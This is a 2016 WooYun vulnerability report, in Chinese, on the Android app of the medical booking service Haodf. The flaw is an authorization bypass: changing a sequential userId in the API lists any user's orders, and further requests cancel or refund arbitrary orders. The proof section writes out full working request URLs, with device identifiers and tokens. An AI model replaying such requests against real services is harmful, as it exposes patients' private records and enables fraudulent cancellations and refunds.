漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0168904
漏洞标题:安卓APP越权-可遍历任意订单并取可对任意订单进行取消和退款操作
相关厂商:好大夫在线
漏洞作者: 路人甲
提交时间:2016-01-11 10:54
修复时间:2016-02-22 16:48
公开时间:2016-02-22 16:48
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开
简要描述:
安卓APP全部存在越权问题:
如:可遍历任意订单并取可对任意订单进行取消和退款操作
详细说明:
APP越权-可遍历任意订单并取可对任意订单进行取消和退款操作
可以通过订单列表接口 遍历userid获取全站用户订单。
然后拿到订单详情,通过userid和订单id 取消所有未支付的订单,并对已支付订单进行退款
也可以脱掉订单库。类似问题很多
漏洞证明:
userId=484579 的所有订单
http://mobile-api.haodf.com/patientapi/reservation_getOrderList?os=android&app=p&pageSize=10&n=2&nowPage=1&m=H60-L01&v=3.4.4.2&s=hd&di=866568025527689&deviceToken=866568025527689&userId=484579&p=4¤tUserId=3854544224&api=1.2&sv=4.4.2&_t=d3dbbe94d64fd8a9742bac255eb502f2
userId=4104830747 的所有订单
http://mobile-api.haodf.com/patientapi/reservation_getOrderList?os=android&app=p&pageSize=10&n=2&nowPage=1&m=H60-L01&v=3.4.4.2&s=hd&di=866568025527689&deviceToken=866568025527689&userId=4104830747&p=4¤tUserId=3854544224&api=1.2&sv=4.4.2&_t=d3dbbe94d64fd8a9742bac255eb502f2
userId=4104637443的所有订单
http://mobile-api.haodf.com/patientapi/reservation_getOrderList?os=android&app=p&pageSize=10&n=2&nowPage=1&m=H60-L01&v=3.4.4.2&s=hd&di=866568025527689&deviceToken=866568025527689&userId=4104637443&p=4¤tUserId=3854544224&api=1.2&sv=4.4.2&_t=d3dbbe94d64fd8a9742bac255eb502f2
参数不一样的只是userId userid是整型的自增主键id
拿到订单列表后通过订单id和usreid 调用该接口可取消订单
http://mobile-api.haodf.com/patientapi/reservation_submitCancelReason?os=android&app=p&n=2&m=H60-L01&v=3.4.4.2&reservOrderId=4105192758&s=hd&di=866568025527689&deviceToken=866568025527689&userId=3854544224&p=4¤tUserId=3854544224&api=1.2&sv=4.4.2&_t=d3dbbe94d64fd8a9742bac255eb502f2&
退款接口:
http://mobile-api.haodf.com/patientapi/reservation_submitCancelReason?os=android&app=p&desc=%E5%8E%BB%E5%8E%BB%E5%8E%BB%0A%E5%88%9A%E5%93%88%E6%9B%B4%E5%A5%BD%E4%B8%AA%E5%92%AF%E5%95%A6%E5%92%AF%E5%95%A6%E5%92%AF%E4%BA%86%E4%BC%9A%E5%93%88%E6%9B%B4%E4%B8%AA%E5%92%AF%E5%95%A6%E5%92%AF%E5%95%A6%E5%92%AF%0A%0A&n=2&m=H60-L01&v=3.4.4.2&reservOrderId=3938638716&s=hd&di=866568025527689&deviceToken=866568025527689&userId=3854544224&p=4¤tUserId=3854544224&api=1.2&sv=4.4.2&_t=d3dbbe94d64fd8a9742bac255eb502f2&
修复方案:
增加接口访问权限验证,或者加密传输数据
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2016-01-11 16:21
厂商回复:
感谢提交,正安排工程师修复。
最新状态:
暂无